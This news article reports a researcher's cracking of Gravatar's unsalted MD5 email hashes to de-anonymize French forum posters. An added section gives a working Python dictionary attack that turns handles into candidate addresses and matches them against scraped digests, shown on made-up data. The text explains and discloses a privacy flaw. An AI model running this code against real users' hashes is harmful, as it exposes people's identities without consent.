LAS VEGAS—If you have an account on Github, StackExchange, or any one of countless other sites, there's a good chance hackers can identify the e-mail address you used to register it. That's because Gravatar, a behind-the-scenes service that says it works with millions of sites, publishes a hash of that address on every page that shows your avatar, and the hash is computed in a way that in many cases is trivial to crack.
People have been warning about the privacy risk posed by Gravatar, short for Globally Recognized Avatar, since at least 2009. That's when a blogger showed he was able to crack the cryptographic hashes that the service uses to uniquely identify its users. Gravatar, it turned out, derived each hash from the user's e-mail address, and the blogger was able to recover the addresses behind about 10 percent of the more than 80,000 user IDs he harvested. Now, a researcher has upped the ante by using a more advanced cracking technique to de-anonymize participants advocating racial hatred and other extreme topics in online forums hosted in France.
Speaking at the PasswordsCon conference in Las Vegas on Wednesday, security researcher Dominique Bongard said he identified 45 percent of the e-mail addresses used to post comments he found in France's most well-known political forum, which he declined to name. His job was made easier by Gravatar's use of the MD5 hash function, which is designed to generate hashes quickly and with a minimum of computing resources. Because the hash is taken directly over the address, with no secret or per-user salt, anyone who scrapes the hashes from avatar URLs can compute MD5 over millions of candidate addresses (forum handles and real names combined with common mail providers) and keep the ones that match. Had Gravatar used bcrypt or another "slow" algorithm, each candidate would have cost far more to test and his task would have taken considerably longer. In a country such as France, where there can be severe legal penalties for voicing extreme opinions, extracting the e-mail addresses isn't without its consequences.
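To make the attack concrete, here is an added example (written for this page, not code from Bongard's talk or from Gravatar) of the dictionary attack the article describes. It uses Gravatar's documented scheme, MD5 over the trimmed and lowercased address, and runs it against a constructed set of four target hashes, mangling a constructed list of forum handles into candidate addresses. The handles, domains and sample addresses are made up for illustration; the mangling rules are deliberately small.

```python
import hashlib
import itertools
from typing import Dict, Iterable, Iterator, Set


def gravatar_hash(email: str) -> str:
    """Gravatar's published scheme: MD5 of the address after trimming
    whitespace and lowercasing. Every page that embeds a Gravatar image
    URL exposes this digest to anyone who can view the page."""
    return hashlib.md5(email.strip().lower().encode("utf-8")).hexdigest()


def candidate_addresses(handles: Iterable[str], domains: Iterable[str]) -> Iterator[str]:
    """Mangle forum handles into plausible local parts, then pair each with
    a domain. These rules are illustrative only; a real wordlist attack uses
    far larger handle lists, mangling rules and provider lists."""
    local_parts = set()
    for h in handles:
        base = h.strip().lower()            # match Gravatar's normalisation
        for v in {base, base.replace(".", ""), base.replace(".", "_")}:
            local_parts.add(v)
            for n in range(100):            # common trailing digits: bob7, bob77
                local_parts.add(f"{v}{n}")
    for local, domain in itertools.product(sorted(local_parts), domains):
        yield f"{local}@{domain}"


def crack(targets: Set[str], candidates: Iterable[str]) -> Dict[str, str]:
    """Offline dictionary attack: hash each candidate once and look it up in
    the set of scraped digests. The input is unsalted, so one MD5 per
    candidate tests it against every target at once; with a slow hash the
    same loop would cost orders of magnitude more per candidate."""
    recovered: Dict[str, str] = {}
    for email in candidates:
        digest = gravatar_hash(email)
        if digest in targets and digest not in recovered:
            recovered[digest] = email
            if len(recovered) == len(targets):
                break
    return recovered


# Constructed sample data. In a real attack the digests are scraped from
# the forum's Gravatar image URLs; here they are built from made-up addresses.
SAMPLE_EMAILS = [
    "Alice.Martin@example.com",       # capitalisation gives no protection
    "bob77@example.org",
    "carol@example.net",
    "xq9!private@obscure.example",    # not derivable from a handle: stays hidden
]
TARGET_HASHES = {gravatar_hash(e) for e in SAMPLE_EMAILS}

# Handles as they would appear beside the posts (also constructed).
HANDLES = ["alice.martin", "Bob", "carol", "dave"]
DOMAINS = ["example.com", "example.org", "example.net", "gmail.com", "yahoo.fr"]


def run_attack() -> Dict[str, str]:
    return crack(TARGET_HASHES, candidate_addresses(HANDLES, DOMAINS))


def recovered_fraction(recovered: Dict[str, str]) -> float:
    return len(recovered) / len(TARGET_HASHES)


if __name__ == "__main__":
    found = run_attack()
    for digest, email in found.items():
        print(f"{digest}  ->  {email}")
    print(f"recovered {recovered_fraction(found):.0%} of {len(TARGET_HASHES)} hashes")
```

The fourth address survives only because no mangling rule reaches it, which is the same reason Bongard's 45 percent is not 100 percent. Note also that a slow hash would only multiply the per-candidate cost: Gravatar still needs a deterministic, unsalted digest so that any site can look up an avatar, and that design is what makes the digest a stable identifier for the address in the first place.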